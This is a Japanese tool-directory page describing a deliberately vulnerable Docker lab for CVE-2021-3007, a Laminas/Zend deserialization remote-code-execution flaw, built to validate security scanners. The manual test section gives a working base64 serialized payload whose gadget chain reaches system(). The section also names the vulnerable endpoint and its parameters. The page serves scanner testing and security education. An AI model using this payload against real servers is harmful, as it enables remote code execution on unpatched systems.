Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2021-3007-vulnerable — CVE-2021-3007 脆弱性テスト環境 - Laminas/Zend Framework デシリアライゼーション RCE | Kitploit
ツール/GitHubGitHub/kre80r/cve-2021-3007-vulnerable
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubkre80r/cve-2021-3007-vulnerable

cve-2021-3007-vulnerable

CVE-2021-3007 脆弱性テスト環境 - Laminas/Zend Framework デシリアライゼーション RCE

リポジトリを見る
8ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-3007 脆弱性テスト環境

Docker CVE CVSS

セキュリティスキャナでのCVE-2021-3007検出を検証するための、意図的に脆弱性を持たせたテスト環境です。

脆弱性概要

属性値
CVE IDCVE-2021-3007
深刻度Critical (CVSS 9.8)
種別安全でないデシリアライゼーション → RCE
影響を受ける製品Laminas HTTP < 2.14.2, Zend Framework 3.0.0
CWECWE-502 (信頼されないデータのデシリアライゼーション)

クイックスタート

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2021-3007-vulnerable
cd CVE-2021-3007-vulnerable

# Start vulnerable environment
docker-compose up -d

# Verify it's running
curl http://localhost:8080

# Test with nuclei (optional)
nuclei -t CVE-2021-3007.yaml -u http://localhost:8080

# Cleanup
docker-compose down

ワンライナー

root@kitploit:~
docker-compose up -d && sleep 3 && curl -s http://localhost:8080 | head -1

手動エクスプロイトテスト

root@kitploit:~
# Send serialized payload triggering RCE
curl -X POST http://localhost:8080/ \
  -d "data=TzoyODoiTGFtaW5hc1xIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086Mjg6IkxhbWluYXNcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMzoiTGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQ0OiIATGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoyMToiTGFtaW5hc1xDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjE3OiJmaWxlX2dldF9jb250ZW50cyI7fX19czoxMzoiACoAYXR0cmlidXRlcyI7YToxOntzOjIyOiJlY2hvIG51Y2xlaUNWRTIwMjEzMDA3IjtpOjE7fX19"

# Expected: Response contains "nucleiCVE20213007" confirming RCE

技術詳細

ガジェットチェーン

root@kitploit:~
Laminas\Http\Response\Stream::__destruct()
  └─► Laminas\View\Helper\Gravatar::__toString()
        └─► Laminas\View\Renderer\PhpRenderer::plugin()
              └─► Laminas\Config\Config::get()
                    └─► system() / file_get_contents()

影響を受けるコンポーネント

パッケージバージョン用途
laminas/laminas-http2.14.1脆弱なHTTPコンポーネント
laminas/laminas-view2.12.0ガジェットチェーンコンポーネント
laminas/laminas-config3.7.0ガジェットチェーンコンポーネント

脆弱なエンドポイント

このアプリケーションは、POST経由でシリアライズされたデータを受け入れます:

  • パス: / または /index.php
  • パラメータ: data, payload, serialized
  • エンコーディング: Base64

環境詳細

コンポーネント値
ベースイメージphp:8.1-apache
ポート8080
コンテナcve-2021-3007-vulnerable

ファイル

root@kitploit:~
.
├── Dockerfile          # Container build configuration
├── docker-compose.yml  # Orchestration (one-shot setup)
├── index.php           # Vulnerable PHP application
├── LICENSE             # MIT License
└── README.md           # This file

セキュリティに関する注意

警告: この環境は、セキュリティテスト目的のみで意図的に脆弱性を持たせています。

禁止事項:

  • 公開ネットワークに公開する
  • 本番環境にデプロイする
  • 無人で稼働させたままにする
  • 悪意のある目的で使用する

推奨事項:

  • 分離されたテスト環境で使用する
  • 使用しないときはコンテナを停止する
  • 正当なセキュリティ研究のみに使用する

参考文献

  • NVD - CVE-2021-3007
  • GitHub Advisory - GHSA-xx8f-qf9f-5fgw
  • Laminas セキュリティリリース
  • CheckPoint Research - FreakOut
  • Ambionics Research

ライセンス

MITライセンス - セキュリティ研究および教育目的のみに使用できます。


nuclei テンプレート検証用に作成 | projectdiscovery/nuclei-templates

ツールをダウンロード